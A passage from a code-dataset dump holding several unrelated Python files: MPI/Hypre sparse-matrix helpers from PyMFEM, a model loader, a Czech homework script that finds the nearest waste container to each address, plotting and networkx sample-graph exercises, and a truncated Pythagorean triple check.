ResNeXt29_4x64d(num_classes)\r\n model_name = 'ResNeXt29_4x64d'\r\n elif model_index == 26:\r\n from models.resnext import ResNeXt29_8x64d\r\n model = ResNeXt29_8x64d(num_classes)\r\n model_name = 'ResNeXt29_8x64d'\r\n elif model_index == 27:\r\n from models.resnext import ResNeXt29_32x4d\r\n model = ResNeXt29_32x4d(num_classes)\r\n model_name = 'ResNeXt29_32x4d'\r\n elif model_index == 28:\r\n from models.senet import se_resnext29_8x64d\r\n model = se_resnext29_8x64d(num_classes)\r\n model_name = 'se_resnext29_8x64d'\r\n elif model_index == 29:\r\n from models.senet import se_resnext29_16x64d\r\n model = se_resnext29_16x64d(num_classes)\r\n model_name = 'se_resnext29_16x64d'\r\n elif model_index == 30:\r\n from models.sknet import sk_resnext29_16x32d\r\n model = sk_resnext29_16x32d(num_classes)\r\n model_name = 'sk_resnext29_16x32d'\r\n elif model_index == 31:\r\n from models.sknet import sk_resnext29_16x64d\r\n model = sk_resnext29_16x64d(num_classes)\r\n model_name = 'sk_resnext29_16x64d'\r\n elif model_index == 32:\r\n from models.vgg import vgg11\r\n model = vgg11(num_classes)\r\n model_name = 'vgg11'\r\n elif model_index == 33:\r\n from models.vgg import vgg13\r\n model = vgg13(num_classes)\r\n model_name = 'vgg13'\r\n elif model_index == 34:\r\n from models.vgg import vgg16\r\n model = vgg16(num_classes)\r\n model_name = 'vgg16'\r\n elif model_index == 35:\r\n from models.vgg import vgg19\r\n model = vgg19(num_classes)\r\n model_name = 'vgg19'\r\n except IndexError:\r\n print('IndexError: model_index should ba an integar between 0 to 35.')\r\n return model, model_name\r\n","repo_name":"AISIGSJTU/Themis","sub_path":"load_models.py","file_name":"load_models.py","file_ext":"py","file_size_in_byte":8505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30687696092","text":"from __future__ import print_function\n\n#\n# this modules works only with parallel version\n#\nimport sys\nimport numpy as np\n\n\ndef get_assumed_patitioning(m):\n '''\n for given size of row, returns proper patitioning\n '''\n from mpi4py import MPI\n\n comm = MPI.COMM_WORLD\n num_proc = MPI.COMM_WORLD.size\n myid = MPI.COMM_WORLD.rank\n\n min_nrows = m // num_proc\n extra_rows = m % num_proc\n start_row = min_nrows * myid + (extra_rows if extra_rows < myid else myid)\n end_row = start_row + min_nrows + (1 if extra_rows > myid else 0)\n nrows = end_row - start_row\n\n return start_row, end_row, nrows\n\n\ndef get_row_partitioning(M):\n from mpi4py import MPI\n comm = MPI.COMM_WORLD\n num_proc = MPI.COMM_WORLD.size\n myid = MPI.COMM_WORLD.rank\n\n m = M.GetNumRows()\n m_array = comm.allgather(m)\n rows = [0] + list(np.cumsum(m_array))\n return rows\n\n\ndef get_col_partitioning(M):\n from mpi4py import MPI\n comm = MPI.COMM_WORLD\n num_proc = MPI.COMM_WORLD.size\n myid = MPI.COMM_WORLD.rank\n\n m = M.GetNumCols()\n m_array = comm.allgather(m)\n rows = [0] + list(np.cumsum(m_array))\n return rows\n\n\ndef ToHypreParVec(vec):\n import mfem.par as mfem\n from mpi4py import MPI\n\n if mfem.sizeof_HYPRE_Int() == 4:\n dtype = 'int32'\n else:\n dtype = 'int64'\n\n comm = MPI.COMM_WORLD\n num_proc = MPI.COMM_WORLD.size\n myid = MPI.COMM_WORLD.rank\n\n vec = vec.flatten()\n ml = vec.shape[0]\n\n # collect col array to determin partitioning\n m_array = comm.allgather(ml)\n cols = [0] + list(np.cumsum(m_array))\n glob_size = cols[-1]\n col_starts = np.array([cols[myid], cols[myid+1], glob_size], dtype=dtype)\n\n vec = vec.astype('float', copy=False)\n v = 
mfem.HypreParVector(MPI.COMM_WORLD,\n glob_size, [vec, col_starts])\n\n return v\n\n\ndef ToHypreParCSR(mat, check_partitioning=False, verbose=False,\n col_starts=None, assert_non_square_no_col_starts=True):\n '''\n convert scipy sparse matrix to hypre\n\n vertically stack csr matrix to generte HYPRE Par CSR\n\n Note:\n row partitioning is inferred from distribution of input matrix.\n column patitioning needs to be specified col_starts.\n\n If col_starts is not given, column partitioning is chosen \n to be the same as row partitioning. This works if matrix is square (M = N).\n\n For an aribtrary rectangular matrix, the column partitioning can be\n different from the row partitioning. For example, MFEM mixedbilinearfomr \n uses different partitiong rules for row and column.\n\n ToDo: change default assert_non_square_no_col_starts to False\n\n '''\n\n from mpi4py import MPI\n import mfem.par as mfem\n\n if mfem.sizeof_HYPRE_Int() == 4:\n dtype = 'int32'\n else:\n dtype = 'int64'\n\n comm = MPI.COMM_WORLD\n num_proc = MPI.COMM_WORLD.size\n myid = MPI.COMM_WORLD.rank\n\n def verbose_message(m, n, nrows, i, j, data, row_starts, col_starts):\n for k in range(num_proc):\n MPI.COMM_WORLD.Barrier()\n if myid == k:\n print('MyID : ', k)\n print((m, n), nrows, len(data), i, j,\n data, row_starts, col_starts)\n print('NNZ', np.sum(data != 0.0))\n MPI.COMM_WORLD.Barrier()\n\n from scipy.sparse import csr_matrix\n\n if isinstance(mat, csr_matrix):\n mat = mat.astype('float')\n ml, nl = mat.shape\n n_array = comm.allgather(nl)\n else:\n raise ValueError(\"Import Matrix Format should be csr or None\")\n\n # collect row array to determin the size of matrix\n m_array = comm.allgather(ml)\n\n rows = [0] + list(np.cumsum(m_array))\n m = rows[-1]\n #row_starts = np.array([rows[myid], rows[myid+1], m], dtype=dtype)\n row_starts = np.array([rows[myid], rows[myid+1]], dtype=dtype)\n\n n = nl\n nrows = ml\n\n i = mat.indptr.astype(dtype)\n j = mat.indices.astype(dtype)\n data = mat.data\n\n if col_starts is None and m != nl:\n col_starts = get_assumed_patitioning(nl)\n if assert_non_square_no_col_starts:\n assert False, \"col_starts must be specified for non diagonal array\"\n if col_starts is None:\n col_starts = row_starts.copy()\n # col_starts[-1]=n\n if col_starts[0] > n:\n col_starts[0] = n\n if col_starts[1] > n:\n col_starts[1] = n\n #col_starts[2] = n\n else:\n # make sure that dtype is right....\n col_starts = np.array(col_starts, dtype=dtype)\n if check_partitioning:\n ch = get_assumed_patitioning(m)\n if (row_starts[0] != ch[0] or\n row_starts[1] != ch[1] or\n nrows != ch[2]):\n for k in range(num_proc):\n MPI.COMM_WORLD.Barrier()\n if myid == k:\n print('MyID : ', k)\n print(ch, nrows, row_starts, col_starts)\n print('NNZ', np.sum(data != 0.0))\n MPI.COMM_WORLD.Barrier()\n raise ValueError(\"partitioning of input matrix is not correct\")\n if verbose:\n verbose_message(m, n, nrows, i, j, data, row_starts, col_starts)\n\n #\n # it seems row_starts and col_starts are both to determin\n # which part is treated diagnal element.\n #\n if (m == n and row_starts[0] == col_starts[0] and\n row_starts[1] == col_starts[1]):\n # this will cause hypre_CSRMatrixReorder call.\n M = mfem.HypreParMatrix(MPI.COMM_WORLD,\n nrows,\n m, n, [i, j,\n data, col_starts])\n M.CopyRowStarts()\n M.CopyColStarts()\n else:\n M = mfem.HypreParMatrix(MPI.COMM_WORLD,\n nrows,\n m, n, [i, j,\n data, row_starts[:2], col_starts[:2]])\n M.CopyRowStarts()\n M.CopyColStarts()\n return M\n\n\ndef ToScipyCSR(mat):\n '''\n convert HypreParCSR 
to Scipy CSR Matrix\n '''\n import mfem.par as mfem\n merged = mfem.SparseMatrix()\n mat.MergeDiagAndOffd(merged)\n\n from scipy.sparse import csr_matrix\n P = csr_matrix((merged.GetDataArray(), merged.GetJArray(), merged.GetIArray()),\n shape=(merged.Height(), merged.Width()))\n P._linked_mat = merged\n return P\n\n\ndef ToScipyCoo(mat):\n '''\n convert HypreParCSR to Scipy Coo Matrix\n '''\n num_rows, ilower, iupper, jlower, jupper, irn, jcn, data = mat.GetCooDataArray()\n from mpi4py import MPI\n myid = MPI.COMM_WORLD.rank\n\n m = iupper - ilower + 1\n n = jupper - jlower + 1\n n = mat.N()\n\n from scipy.sparse import coo_matrix\n try:\n return coo_matrix((data, (irn-ilower, jcn)), shape=(m, n))\n except:\n print(\"wrong input\")\n print(num_rows, ilower, iupper, jlower, jupper)\n print(np.min(irn-ilower), np.max(irn-ilower),\n np.min(jcn), np.max(jcn), (m, n))\n raise\n\n\ndef InnerProductComplex(A, B):\n def ensure_hypreread(V):\n if V is None:\n return\n if not V._hypreread_called:\n V.HypreRead()\n\n import mfem.par as mfem\n R_A, I_A = A\n R_B, I_B = B\n\n for V in (R_A, I_A, R_B, I_B):\n ensure_hypreread(V)\n\n if I_A is None and I_B is None:\n return mfem.InnerProduct(R_A, R_B)\n elif I_A is None:\n r = mfem.InnerProduct(R_A, R_B)\n i = mfem.InnerProduct(R_A, I_B)\n elif I_B is None:\n r = mfem.InnerProduct(R_A, R_B)\n i = mfem.InnerProduct(I_A, R_B)\n else:\n r = mfem.InnerProduct(R_A, R_B) - mfem.InnerProduct(I_A, I_B)\n i = mfem.InnerProduct(R_A, I_B) + mfem.InnerProduct(I_A, R_B)\n return r + 1j * i\n\n\ndef ParAdd(A, B):\n '''\n add HypreParCSR\n\n '''\n col_starts = A.GetColPartArray() # ; col_starts[2] = A.N()\n return ToHypreParCSR((ToScipyCoo(A) + ToScipyCoo(B)).tocsr(),\n col_starts=col_starts)\n\n\ndef ParMultVecComplex(A, v):\n '''\n A*v\n '''\n import mfem.par as mfem\n from mpi4py import MPI\n\n comm = MPI.COMM_WORLD\n num_proc = MPI.COMM_WORLD.size\n myid = MPI.COMM_WORLD.rank\n\n R_A, I_A = A\n R_v, I_v = v\n\n # Take Row partitioning of A for output\n if R_A is not None:\n part = R_A.GetRowPartArray()\n elif I_A is not None:\n part = I_A.GetRowPartArray()\n else:\n return (None, None)\n\n ans_r = ToHypreParVec(np.zeros(part[1]-part[0]))\n if I_A is None and I_v is None:\n R_A.Mult(R_v, ans_r)\n return (ans_r, None)\n else:\n ans_i = ToHypreParVec(np.zeros(part[1]-part[0]))\n\n if I_A is None:\n R_A.Mult(R_v, ans_r)\n R_A.Mult(I_v, ans_i)\n elif I_v is None:\n R_A.Mult(R_v, ans_r)\n I_A.Mult(R_v, ans_i)\n else:\n ans_r2 = ToHypreParVec(np.zeros(part[1]-part[0]))\n ans_i2 = ToHypreParVec(np.zeros(part[1]-part[0]))\n R_A.Mult(R_v, ans_r)\n I_A.Mult(I_v, ans_r2)\n ans_r -= ans_r2\n\n R_A.Mult(I_v, ans_i)\n I_A.Mult(R_v, ans_i2)\n ans_i += ans_i2\n\n return (ans_r, ans_i)\n\n\ndef ParMultComplex(A, B):\n '''\n compute complex mult of hypre real matrices\n\n A = (R_A, I_A)\n B = (R_B, I_B)\n\n (R_A*R_B - I_A*I_B, R_A*I_B + I_A*R_B)\n '''\n from mpi4py import MPI\n import mfem.par as mfem\n\n comm = MPI.COMM_WORLD\n num_proc = MPI.COMM_WORLD.size\n myid = MPI.COMM_WORLD.rank\n\n R_A, I_A = A\n R_B, I_B = B\n\n if I_A is None and I_B is None:\n r = mfem.ParMult(R_A, R_B)\n r.CopyRowStarts()\n r.CopyColStarts()\n\n return (r, None)\n elif I_A is None:\n r = mfem.ParMult(R_A, R_B)\n i = mfem.ParMult(R_A, I_B)\n r.CopyRowStarts()\n r.CopyColStarts()\n i.CopyRowStarts()\n i.CopyColStarts()\n return (r, i)\n\n elif I_B is None:\n r = mfem.ParMult(R_A, R_B)\n i = mfem.ParMult(I_A, R_B)\n r.CopyRowStarts()\n r.CopyColStarts()\n i.CopyRowStarts()\n i.CopyColStarts()\n\n return 
(r, i)\n else:\n A = mfem.ParMult(R_A, R_B)\n B = mfem.ParMult(I_A, I_B)\n C = mfem.ParMult(R_A, I_B)\n D = mfem.ParMult(I_A, R_B)\n col_starts = A.GetColPartArray() # ; col_starts[2] = A.N()\n r = ToHypreParCSR((ToScipyCoo(A) - ToScipyCoo(B)).tocsr(),\n col_starts=col_starts)\n i = ToHypreParCSR((ToScipyCoo(C) + ToScipyCoo(D)).tocsr(),\n col_starts=col_starts)\n return (r, i)\n\n\ndef TransposeComplex(A):\n '''\n A is tuple (A_real, A_imag), whose real/imag are\n HypreParCSR\n '''\n\n R = A[0].Transpose() if A[0] is not None else None\n I = A[1].Transpose() if A[1] is not None else None\n if R is not None:\n R.thisown = True\n if I is not None:\n I.thisown = True\n return (R, I)\n\n\ndef Conj(A):\n\n R = A[0]\n I = A[1]\n if I is None:\n return A\n col_starts = I.GetColPartArray()\n col_starts[2] = I.N()\n I = ToHypreParCSR(-ToScipyCoo(I).tocsr(), col_starts=col_starts)\n return (R, I)\n\n\ndef RapComplex(A, B):\n '''\n Bt * A * B\n\n for complex A and B\n '''\n X = ParMultComplex(A, B)\n return ParMultComplex(Conj(TransposeComplex(B)), X)\n\n\ndef Array2HypreVec(v, partitioning=None, rank=0):\n '''\n convert array in rank (default = 0) to \n distributed Hypre 1D Matrix (size = m x 1)\n '''\n from mpi4py import MPI\n comm = MPI.COMM_WORLD\n myid = comm.Get_rank()\n\n data = v if myid == rank else None\n data = comm.bcast(data, root=rank)\n\n if partitioning is None:\n start_row, end_row, nrows = get_assumed_patitioning(len(data))\n else:\n start_row = partitioning[myid]\n end_row = partitioning[myid+1]\n nrows = end_row - start_row\n\n from scipy.sparse import csr_matrix, coo_matrix\n v = np.ascontiguousarray(data[start_row:end_row].flatten())\n return ToHypreParVec(v)\n #m = csr_matrix(np.array(d).reshape(-1,1), shape=(nrows,1), dtype='float')\n # return ToHypreParCSR(m)\n\n\ndef HypreVec2Array(V, copy=True):\n '''\n convert HypreParVec to 1D array \n on rank = 0\n '''\n from mpi4py import MPI\n myid = MPI.COMM_WORLD.rank\n\n data = V.GetDataArray()\n if copy:\n data = data.copy()\n\n rcounts = len(data)\n\n rcounts = MPI.COMM_WORLD.gather(rcounts, root=0)\n cm = np.hstack((0, np.cumsum(rcounts)))\n disps = list(cm[:-1])\n recvdata = None\n senddata = [data, data.shape[0]]\n\n if myid == 0:\n length = cm[-1]\n recvbuf = np.empty([length], dtype='float')\n recvdata = [recvbuf, rcounts, disps, MPI.DOUBLE]\n else:\n recvdata = [None, rcounts, disps, MPI.DOUBLE]\n recvbuf = None\n\n MPI.COMM_WORLD.Gatherv(senddata, recvdata, root=0)\n if myid == 0:\n MPI.COMM_WORLD.Barrier()\n return np.array(recvbuf)\n MPI.COMM_WORLD.Barrier()\n return None\n\n\ndef ResetHypreDiag(M, idx, value=1.0):\n '''\n set diagonal element to value (normally 1)\n '''\n col_starts = M.GetColPartArray()\n\n num_rows, ilower, iupper, jlower, jupper, irn, jcn, data = M.GetCooDataArray()\n from mpi4py import MPI\n myid = MPI.COMM_WORLD.rank\n\n m = iupper - ilower + 1\n n = jupper - jlower + 1\n n = M.N()\n from scipy.sparse import coo_matrix, lil_matrix\n try:\n mat = coo_matrix((data, (irn-ilower, jcn)), shape=(m, n)).tolil()\n except:\n print(\"wrong input\")\n print(num_rows, ilower, iupper, jlower, jupper)\n print(np.min(irn-ilower), np.max(irn-ilower),\n np.min(jcn), np.max(jcn), (m, n))\n raise\n\n idx = np.array(idx, dtype=int, copy=False)\n ii = idx[np.logical_and(idx >= ilower, idx <= iupper)]\n mat[ii-ilower, ii] = value\n # for ii in idx:\n # if ii >= ilower and ii <= iupper:\n # mat[ii-ilower, ii] = value\n\n return ToHypreParCSR(mat.tocsr(), col_starts=col_starts)\n\n\ndef ResetHypreRow(M, idx):\n '''\n set 
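# The block-partitioning arithmetic in get_assumed_patitioning above hands the
# first (m % num_proc) ranks one extra row each. A standalone sketch with the
# MPI rank and size passed explicitly (hypothetical helper, same arithmetic):
def assumed_partition(m, myid, num_proc):
    min_nrows = m // num_proc
    extra_rows = m % num_proc
    start_row = min_nrows * myid + (extra_rows if extra_rows < myid else myid)
    end_row = start_row + min_nrows + (1 if extra_rows > myid else 0)
    return start_row, end_row, end_row - start_row

# 10 rows over 3 ranks -> [(0, 4, 4), (4, 7, 3), (7, 10, 3)]
print([assumed_partition(10, r, 3) for r in range(3)])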
row 0.0\n '''\n col_starts = M.GetColPartArray() # ; col_starts[2] = M.N()\n num_rows, ilower, iupper, jlower, jupper, irn, jcn, data = M.GetCooDataArray()\n\n from mpi4py import MPI\n myid = MPI.COMM_WORLD.rank\n\n m = iupper - ilower + 1\n n = jupper - jlower + 1\n n = M.N()\n from scipy.sparse import coo_matrix, lil_matrix\n\n k = np.in1d(irn, idx)\n data[k] = 0.0\n\n mat = coo_matrix((data, (irn-ilower, jcn)), shape=(m, n)).tocsr()\n mat.eliminate_zeros()\n\n return ToHypreParCSR(mat.tocsr(), col_starts=col_starts)\n\n\ndef ResetHypreCol(M, idx):\n '''\n set col zero\n '''\n col_starts = M.GetColPartArray() # ; col_starts[2] = M.N()\n num_rows, ilower, iupper, jlower, jupper, irn, jcn, data = M.GetCooDataArray()\n\n from mpi4py import MPI\n myid = MPI.COMM_WORLD.rank\n\n m = iupper - ilower + 1\n n0 = jupper - jlower + 1\n n = M.N()\n from scipy.sparse import coo_matrix, lil_matrix\n\n k = np.in1d(jcn, idx)\n data[k] = 0.0\n\n mat = coo_matrix((data, (irn-ilower, jcn)), shape=(m, n)).tocsr()\n mat.eliminate_zeros()\n return ToHypreParCSR(mat.tocsr(), col_starts=col_starts)\n\n\ndef ReadHypreDiag(M, idx):\n '''\n get diagonal element\n '''\n col_starts = M.GetColPartArray()\n\n num_rows, ilower, iupper, jlower, jupper, irn, jcn, data = M.GetCooDataArray()\n from mpi4py import MPI\n myid = MPI.COMM_WORLD.rank\n\n m = iupper - ilower + 1\n n = M.N()\n from scipy.sparse import coo_matrix, lil_matrix\n try:\n mat = coo_matrix((data, (irn-ilower, jcn)), shape=(m, n)).tolil()\n except:\n print(\"wrong input\")\n print(num_rows, ilower, iupper, jlower, jupper)\n print(np.min(irn-ilower), np.max(irn-ilower),\n np.min(jcn), np.max(jcn), (m, n))\n raise\n\n idx = np.array(idx, dtype=int, copy=False)\n ii = idx[np.logical_and(idx >= ilower, idx <= iupper)]\n\n tmp = mat[ii-ilower, ii].toarray().flatten()\n\n #idx = np.arange(ilower, min([iupper+1, n]))\n #ii = idx[np.logical_and(idx >= ilower, idx <= iupper)]\n #tmp = mat[ii-ilower, ii].toarray().flatten()\n\n return tmp\n","repo_name":"mfem/PyMFEM","sub_path":"mfem/common/parcsr_extra.py","file_name":"parcsr_extra.py","file_ext":"py","file_size_in_byte":16104,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"48"} +{"seq_id":"7792401165","text":"from pyproj import Transformer\nimport json\nimport argparse\n\ndef dist(source :list, finish : list) -> float: # Vzdálenost dvou bodů\n return ((finish[0] - source[0])**2 + (finish[1] - source[1])**2)**0.5\n\ndef is_private_for_adress(can : dict, house_adr : str) -> bool:\n if can['properties']['PRISTUP'] != \"volně\":\n if can['properties']['STATIONNAME'] == house_adr:\n return True\n return False\n\ndef change_coord(adresses : dist) -> None: # Převod souřadnic z WGS84 do jtsk\n wgstojtsk = Transformer.from_crs(4326,5514, always_xy = True)\n for item in adresses['features']:\n item['geometry']['coordinates'] = wgstojtsk.transform(*item['geometry']['coordinates'])\n\ndef dist_calc(bins : list, coord_adr : list, adress : list) -> tuple: # Kontejnery, souřadnice, číslo\n min_dist = None\n id_number = None\n for can in bins: \n if is_private_for_adress(can, adress):\n min_dist = 0\n id_number = can['properties']['ID'] \n break\n if can['properties']['PRISTUP'] == \"volně\":\n coord_bin = can['geometry']['coordinates']\n distance = dist(coord_adr, coord_bin)\n if min_dist == None or min_dist > distance:\n min_dist = distance\n id_number = can['properties']['ID'] \n return min_dist, id_number\n \ndef update_stat(adress : list, item : dict, max_dist : float, sum : 
float, distance : float) -> tuple:\n sum += distance\n if max_dist <= distance:\n max_dist = distance\n adress = [item['properties']['addr:street'], item['properties']['addr:housenumber']]\n return adress, max_dist, sum, distance\n\ndef write_file_with_ID(adresses : dict) -> None:\n with open(\"adresy_kontejnery.geojson\", \"w\", encoding = 'utf-8') as write_json:\n json.dump(adresses, write_json, ensure_ascii = False, indent = 2)\n\ndef median_calc(dist_array : list, counter : int) -> int:\n dist_array.sort()\n median = 0\n if counter%2 == 1:\n median = dist_array[counter//2]\n else:\n median = (dist_array[counter//2 - 1] + dist_array[counter//2])/2\n return median\n\ndef process(adresses : dist, bins : dist) -> tuple:\n suma = 0\n min_distance = 0\n dist_array = []\n adress = None\n counter = 0\n max_dist = 0\n median = 0\n id_number = 0\n for item in adresses['features']:\n coord_adr = item['geometry']['coordinates']\n house_adr = f\"{item['properties']['addr:street']} {item['properties']['addr:housenumber']}\"\n counter += 1\n min_distance, id_number = dist_calc(bins['features'], coord_adr, house_adr)\n if min_distance >= 10000:\n raise SystemExit(\">> Minimální vzdálenost přesáhla stanovený limit (10 km). Program byl ukončen.\")\n item['kontejner'] = id_number\n dist_array.append(min_distance)\n adress, max_dist, suma, min_distance = update_stat(adress, item, max_dist, suma, min_distance)\n # Zápis do souboru adresy_kontejnery.geojson\n write_file_with_ID(adresses)\n # Výpočet mediánu\n median = median_calc(dist_array, counter)\n return suma/counter, median, adress, max_dist\n\ndef file_open(file_name : str) -> dict:\n try:\n with open(file_name, \"r\", encoding = 'utf-8') as file:\n dictionary = json.load(file)\n return dictionary\n except FileNotFoundError:\n raise SystemExit(f\">> Soubor s názvem <{file_name}> neexistuje.\")\n except PermissionError:\n raise SystemExit(f\">> Ke čtení souboru s názvem <{file_name}> nemáte práva.\")\n\ntry:\n adresses = None # slovník s adresami\n bins = None # slovník s kontejnery\n far_adress = None # Adresa, z které je to ke kontejneru nejdále\n average = 0 # Průměrná minimální vzdálenost\n # Parametry programu\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-a\",\"--adress\", action = \"store\", dest = \"adr\", default = \"adresy.geojson\")\n parser.add_argument(\"-k\",\"--container\", action = \"store\", dest = \"cont\", default = 'kontejnery.geojson')\n arguments = parser.parse_args()\n\n adresses = file_open(arguments.adr)\n bins = file_open(arguments.cont) \n\n print(f\"Počet načtených adres: {len(adresses['features']):.0f}\")\n print(f\"Počet načtených kontejnerů: {len(bins['features']):.0f}\")\n # Převod WGS84 na S-JTSK\n change_coord(adresses)\n \n if not len(bins['features']) or not len(adresses['features']):\n print(\">> nebyly načteny žádné adresy nebo žádné veřejné kontejnery, program byl ukončen.\")\n else:\n average, median, far_adress, max_dist = process(adresses, bins)\n print(f\"Prumerná minimální vzdalenost ke kontejneru je {round(average, 0):.0f} m.\")\n print(f\"Medián minimálních vzdáleností ke kontejnerům je {round(median, 0):.0f} m.\")\n print(f\"Nejdále ke kontejneru je z adresy {far_adress[0]} {far_adress[1]} a to {round(max_dist, 0):.0f} m.\")\nexcept KeyError:\n print(\">> Klíč nebyl ve slovníku nalezen.\")\nexcept ValueError:\n print(\">> Špatný formát vstupu.\")\nexcept SystemExit as sysErr:\n 
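# median_calc in du_3.py above sorts in place and takes the middle element,
# or the mean of the two middle ones for even counts; a quick check of both
# parities:
print(median_calc([5.0, 1.0, 3.0], 3))       # 3.0
print(median_calc([4.0, 1.0, 3.0, 2.0], 4))  # 2.5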
print(sysErr)\n","repo_name":"simamarti/Uvod_do_programovani_I","sub_path":"du_3/du_3.py","file_name":"du_3.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"39122029692","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nx = np.linspace(-10.0, 10.0, 1000)\n\ny1 = (1.0 / np.sqrt(2.0 * np.pi)) * np.exp( -1.0 * np.power(x, 2) / 2.0)\ny2 = (1.0 / (2.0 * np.sqrt(np.pi))) * np.exp( -1.0 * np.power(x - 1, 2) / 4.0)\n\nplt.plot(x, y1, label=\"P(x|w1)\")\nplt.plot(x, y2, label=\"P(x|w2)\")\nplt.title('Class conditional PDF (1-2-b)')\nplt.xlabel('x')\nplt.ylabel('P(x|wi)')\nplt.grid('on')\nplt.legend()\nplt.show()\n\nz1 = y1 / (y1 + y2)\nz2 = y2 / (y1 + y2)\n\nplt.plot(x, z1, label=\"P(w1|x)\")\nplt.plot(x, z2, label=\"P(w2|x)\")\nplt.title('P(wi|x) (1-2-b)')\nplt.xlabel('x')\nplt.ylabel('P(wi|x)')\nplt.grid('on')\nplt.legend()\nplt.show()","repo_name":"zzy1993/ml","sub_path":"hw1/code/my1-2-b.py","file_name":"my1-2-b.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11381089818","text":"def multiplicado(*args):\n lista = []\n total = 1\n try:\n for numbers in range(len(args)):\n lista.append(int(args[numbers]))\n\n for i in range(len(lista)):\n if lista[i] == 0:\n continue\n total *= lista[i]\n par_or_impar = 'Par' if (total % 2 == 0) else 'Ímpar'\n print('Sua multiplicação deu: {t} e ele é: {pi}'.format(t = total, pi = par_or_impar))\n except:\n print('Digite apenas números! ')\n\nmultiplicado(1, 3, 0, 5, 1, 9)","repo_name":"filipe-golves-dev/me-tornando-um-programador","sub_path":"Estudos Python/2 - Python Intermediário /Resumos/4 - Args/aula113_args.py","file_name":"aula113_args.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"23335180821","text":"# graph samples\n\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n\nclass SampleGraph():\n def __init__(self):\n self.data = []\n self.nodes = 'ABC'\n self.edges = [\n ('A', 'B'), ('A', 'C')]\n self.pos = {\n 'A': (1, 1.5),\n 'B': (2, 1),\n 'C': (2, 2)\n }\n self.labels = {c: f'${c}$' for i, c in enumerate(self.nodes)}\n self.G = None\n\n def Get_Networkx_Graph(self):\n if self.G is None:\n self.G = nx.Graph()\n self.G.add_nodes_from(self.nodes)\n self.G.add_edges_from(self.edges)\n return(self.G)\n\n def Draw_Networkx_Graph(self):\n nx.draw_networkx_nodes(self.G, self.pos, node_color='grey', node_size=500, alpha=0.8)\n nx.draw_networkx_labels(self.G, self.pos, labels=self.labels, font_size=16)\n nx.draw_networkx_edges(self.G, self.pos, width=1.5, alpha=0.5, edge_color='g')\n plt.show()\n return\n\n\nclass graph1(SampleGraph):\n\n def __init__(self):\n SampleGraph.__init__(self)\n self.data = []\n self.nodes = 'ABCDEFGHIJ'\n self.edges = [\n ('A', 'B'), ('A', 'E'),\n ('B', 'F'),\n ('C', 'G'),\n ('D', 'E'), ('D', 'H'),\n ('E', 'H'),\n ('F', 'G'), ('F', 'J'), ('F', 'I'),\n ('G', 'J'),\n ('H', 'I'),\n # ('I')\n # ('J')\n ]\n\n self.pos = {\n 'A': (2, 3),\n 'B': (3, 3),\n 'C': (4, 3),\n 'D': (1, 2),\n 'E': (2, 2),\n 'F': (3, 2),\n 'G': (4, 2),\n 'H': (1.5, 1),\n 'I': (2.5, 1),\n 'J': (3.5, 1)\n }\n self.labels = {c: f'${c}$' for i, c in enumerate(self.nodes)}\n\n def Draw_Networkx_Graph(self):\n # node_color (color string, or array of floats) – Node color. 
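# my1-2-b.py above normalizes the two class-conditional densities pointwise,
# y_i / (y1 + y2), which is Bayes' rule under equal priors P(w1) = P(w2) = 0.5.
# A sketch with explicit priors (hypothetical generalization, not part of the
# original script):
def posterior(p_x_w1, p_x_w2, prior1=0.5, prior2=0.5):
    evidence = p_x_w1 * prior1 + p_x_w2 * prior2  # P(x)
    return p_x_w1 * prior1 / evidence, p_x_w2 * prior2 / evidence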
Can be a single color format string (default=’r’),\n # or a sequence of colors with the same length as nodelist. If numeric values are specified they will be mapped\n # to colors using the cmap and vmin,vmax parameters. See matplotlib.scatter for more details.\n\n # can add nodelist to work with subset of nodes\n nx.draw_networkx_nodes(self.G, self.pos, nodelist=list('ABCD'), node_color='red', node_size=500, alpha=0.8)\n nx.draw_networkx_nodes(self.G, self.pos, nodelist=list('EFGH'), node_color='blue', node_size=500, alpha=0.8)\n nx.draw_networkx_nodes(self.G, self.pos, nodelist=list('IJ'), node_color='grey', node_size=500, alpha=0.8)\n\n # add labels to nodes\n nx.draw_networkx_labels(self.G, self.pos, labels=self.labels, font_size=16)\n\n # add edges\n nx.draw_networkx_edges(self.G, self.pos, width=1.5, alpha=0.5, edge_color='g')\n return\n\n\nif __name__ == '__main__':\n print('sample graph')\n\n\nclass closeness_centrality_graph(SampleGraph):\n def __init__(self):\n self.data = []\n self.nodes = 'ABCDE'\n self.edges = [\n ('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'E')]\n self.pos = {\n 'A': (1, 1),\n 'B': (2, 1),\n 'C': (3, 1),\n 'D': (4, 1),\n 'E': (5, 1)\n }\n self.labels = {c: f'${c}$' for i, c in enumerate(self.nodes)}\n self.G = None\n\n\nclass at1q3(SampleGraph): \n def __init__(self): \n SampleGraph.__init__(self)\n self.data = []\n self.nodes = 'ABCDEFG'\n self.edges = [\n ('A','G'), ('A','F'),('A','E'),('A','D'),\n ('B','F'), ('B','E'),('B','D'),('B','C'),\n ('C','E'),('C','D'),\n ('D','E'),\n ('E','F'),('E','G'),\n ('F','G')\n #('G')\n ]\n self.pos = {\n 'A': (1,1), \n 'B': (3,2),\n 'C': (3,1), \n 'D': (2,1), \n 'E': (2,2),\n 'F': (2,3), \n 'G': (1,2)\n }\n self.labels = {c: f'${c}$' for i, c in enumerate(self.nodes)}\n self.G = None\n","repo_name":"mutazag/sina","sub_path":"helpers/samples.py","file_name":"samples.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"41813355717","text":"\"\"\"\nLøsningsforslag\nØving 2 - Oppgave 3\n\n@author: Thomas Nyborg\n\"\"\"\n\ndef pytTrip(a,b,c):\n sider = [a,b,c]\n sider.sort()\n \n return(sider[0]**2 + sider[1]**2 == sider[2]**2)\n\n\na = 